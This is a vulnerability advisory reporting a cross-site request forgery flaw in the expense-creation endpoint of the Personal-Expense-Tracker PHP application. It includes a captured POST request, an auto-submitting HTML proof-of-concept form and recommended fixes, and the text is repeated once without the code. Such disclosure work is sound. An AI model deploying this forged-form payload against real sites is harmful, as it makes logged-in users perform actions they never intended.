Summary:
A Cross-Site Request Forgery (CSRF) vulnerability exists on the expense creation endpoint (add_expense.php). Authenticated users can be tricked into submitting a forged POST request (for example by visiting a malicious page) which will add an expense on their behalf (e.g., adding a 3000 entry in Medicine). The endpoint lacks a CSRF token and does not enforce sufficient request origin/Referer validation.
Steps to Reproduce:
-
Log in to the application with a valid user account.
-
Capture a legitimate expense creation request (example):
POST /Personal-Expense-Tracker/add_expense.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=rttnn0mvlple0r5t6pt2efmcf5
expenseamount=3000&expensedate=2025-11-01&expensecategory=Medicine&add=
-
Create a malicious webpage that auto-submits the forged request to the application's endpoint (example PoC below).
-
Lure the authenticated victim to visit the malicious page (e.g., via link/email). When the victim visits the page while logged in to the Personal-Expense-Tracker, the form will submit and the application will record an expense of 3000 in the "Medicine" category for the specified date.
PoC (HTML):
<!doctype html>
<html>
<body>
<form id="csrf" method="POST" action="http://localhost/Personal-Expense-Tracker/add_expense.php">
<input type="hidden" name="expenseamount" value="3000"/>
<input type="hidden" name="expensedate" value="2025-11-01"/>
<input type="hidden" name="expensecategory" value="Medicine"/>
<input type="hidden" name="add" value=""/>
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>Vendor of the product(s) info
EbeyJoeRegi
Affected product(s)/code base info
Product: Personal-Expense-Tracker
Version: Git commit 0b588ed (local copy tested Nov 1, 2025)
Impact:
An attacker can cause authenticated users to perform unwanted expense-creation actions without their knowledge. Potential impacts include:
Integrity loss: unauthorized expense records added to victim accounts (financial data corruption).
Privacy/forensic confusion: falsified entries can obscure real activity.
Chaining attacks: forged actions might be combined with other flaws to escalate impact (e.g., trigger alerts, manipulate reports).
Affected component(s):
add_expense.php (expense creation endpoint)
Any downstream logic that trusts the source of expense creation (reporting, notification, dashboards)
Recommended mitigations:
CSRF token: Implement per-session (or per-form) unpredictable CSRF tokens and validate them server-side for any state-changing POST endpoints (including add_expense.php). Reject requests without a valid token.
SameSite cookies: Set session cookies with SameSite=strict or SameSite=lax (depending on app requirements) to reduce CSRF risk from cross-site contexts.
Origin/Referer checks: Enforce strict Origin or Referer header validation for sensitive POST requests (accept only known, same-origin values).
Discovered by:
Team DisclosureX
Summary:
A Cross-Site Request Forgery (CSRF) vulnerability exists on the expense creation endpoint (
add_expense.php). Authenticated users can be tricked into submitting a forged POST request (for example by visiting a malicious page) which will add an expense on their behalf (e.g., adding a 3000 entry in Medicine). The endpoint lacks a CSRF token and does not enforce sufficient request origin/Referer validation.Steps to Reproduce:
Log in to the application with a valid user account.
Capture a legitimate expense creation request (example):
Create a malicious webpage that auto-submits the forged request to the application's endpoint (example PoC below).
Lure the authenticated victim to visit the malicious page (e.g., via link/email). When the victim visits the page while logged in to the Personal-Expense-Tracker, the form will submit and the application will record an expense of 3000 in the "Medicine" category for the specified date.
PoC (HTML):
Vendor of the product(s) info
EbeyJoeRegi
Affected product(s)/code base info
Product: Personal-Expense-Tracker
Version: Git commit 0b588ed (local copy tested Nov 1, 2025)
Impact:
An attacker can cause authenticated users to perform unwanted expense-creation actions without their knowledge. Potential impacts include:
Integrity loss: unauthorized expense records added to victim accounts (financial data corruption).
Privacy/forensic confusion: falsified entries can obscure real activity.
Chaining attacks: forged actions might be combined with other flaws to escalate impact (e.g., trigger alerts, manipulate reports).
Affected component(s):
add_expense.php (expense creation endpoint)
Any downstream logic that trusts the source of expense creation (reporting, notification, dashboards)
Recommended mitigations:
CSRF token: Implement per-session (or per-form) unpredictable CSRF tokens and validate them server-side for any state-changing POST endpoints (including add_expense.php). Reject requests without a valid token.
SameSite cookies: Set session cookies with SameSite=strict or SameSite=lax (depending on app requirements) to reduce CSRF risk from cross-site contexts.
Origin/Referer checks: Enforce strict Origin or Referer header validation for sensitive POST requests (accept only known, same-origin values).
Discovered by:
Team DisclosureX